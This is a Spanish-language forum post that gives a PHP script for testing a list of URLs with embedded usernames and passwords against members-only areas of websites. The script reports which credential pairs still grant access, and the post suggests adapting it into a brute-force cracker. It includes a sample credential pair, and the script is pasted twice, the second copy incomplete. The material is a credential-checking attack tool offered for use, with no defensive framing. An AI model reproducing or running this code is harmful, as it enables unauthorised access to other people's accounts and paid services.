
Ejemplo de las URL's que tengo:
Código:
http://qlysp1oon:B4k71D8gj2@dominio.com/members/
El usuario es "qlysp1oon" y la pass es "B4k71D8gj2", lo que está después de la "@" es la URL a la que se accederá si colocamos la pass correcta.
El problema es que en este listado hay muchas contraseñas que son incorrectas, entonces con un simple script en PHP podemos probar cada URL para saber si funciona

<?php
$a=fopen("NOMBRE DEL ARCHIVO QUE CONTIENE URL'S", "r");
$c="";
while(!feof($a)){
$c.=fread($a, 1024);
}
fclose($a);
$urls=explode("\r\n", $c);
foreach($urls as $url){
if(@fopen($url, "r")){
echo "Esta URL es correcta: $url\n";
}
}
?>
$a=fopen("NOMBRE DEL ARCHIVO QUE CONTIENE URL'S", "r");
$c="";
while(!feof($a)){
$c.=fread($a, 1024);
}
fclose($a);
$urls=explode("\r\n", $c);
foreach($urls as $url){
if(@fopen($url, "r")){
echo "Esta URL es correcta: $url\n";
}
}
?>
Debes poner el archivo de texto con las URLS en le mismo directorio que el script y escribir el nombre del listado en la primer línea, en donde se indica.
Nos mostrará cada URL que es correcta.
Modificando un poquito el code podemos hacer un crackeador de fuerza bruta o también muchas otras cosas útiles

Saludos!